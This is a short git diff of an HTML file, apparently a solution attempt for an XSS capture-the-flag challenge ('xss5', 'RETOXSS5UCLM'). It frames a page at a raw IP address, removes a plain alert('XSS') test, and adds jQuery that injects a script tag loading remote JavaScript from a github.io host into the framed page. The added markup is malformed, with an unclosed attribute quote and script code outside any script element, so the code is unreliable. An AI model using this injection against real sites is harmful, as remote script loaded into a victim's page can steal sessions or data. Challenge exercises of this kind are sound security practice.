--- a/index.html
+++ b/index.html
@@ -1,5 +1,6 @@
 
 <iframe src="http://54.37.156.50:5000/xss5?name=hack"
- height="800" width="800">
- <script>alert('XSS')</script>
+height="800" width="800" id="reto>
+$("#reto").contents().find("head").append("<script type='text/javascript' src='https://luisrb85.github.io/RETOXSS5UCLM/reto.js'>");
+
 
